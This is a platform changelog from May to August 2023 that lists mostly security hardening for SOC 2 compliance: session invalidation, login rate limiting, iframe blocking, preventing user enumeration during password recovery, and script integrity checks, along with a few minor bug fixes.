Starting in May 2023, we'll be documenting changes that are made to the platform. This document will be a list of all of those changes and the dates those changes are deployed to our production environment
Auguest 28th, 2023
- Invalidate user session on logout. Previously the token generated during login only managed by the browser. When a user logged out, we instructed the user to destroy the validation token. This update adds server side invalidation of the token during log out.
- Server header removal from HTTP responses.
- Removal of crossdomain.xml resource
- Rate limit authentication requests. As part of SOC 2 compliance requirements, we have implemented rate limiting on failed login attempts. IP addresses that fail logging in 10 times consecutively are not allowed to log in again for 15 minutes.
- Default parsing format of user is now viewable in when viewing staff members information.
- Prevent IFRAME access to admin site. As part of SOC 2 compliance requirements, we have disabled the ability to IFRAME the admin site. Nobody was actually doing this, so there is no effect, we've just explicitly disabled it now.
- Do not inform user if the provided email address was not found when attempting to recover password. Previously, we would inform the user if the email address they provided was not found in our system when trying to recover a password. We did this to try and help users that may have multiple email addresses but it also provided context for potentially malicious actors to use it for user enumeration. We no longer provide feedback if the email address was found or not found when recovering a password.
July 28th, 2023
- Added password complexity requirements when creating users and changing passwords. This was done in order to address SOC 2 compliance requirements.
- Fix for issue where unique viewers stopped populating. This was because of a change that Google made to it's APIs for fetching analytics data.
- Updates to include links to invoices on First and Second late notices. Final notices already included the links.
June 11th, 2023
- Added default parsing format to user profile view
- Added integrity checking when referencing external JavaScript libraries to ensure highjacking and injection are prevented.
May 12th, 2023
- Fixed position issue with realtime caption pull endpoint
0 Comments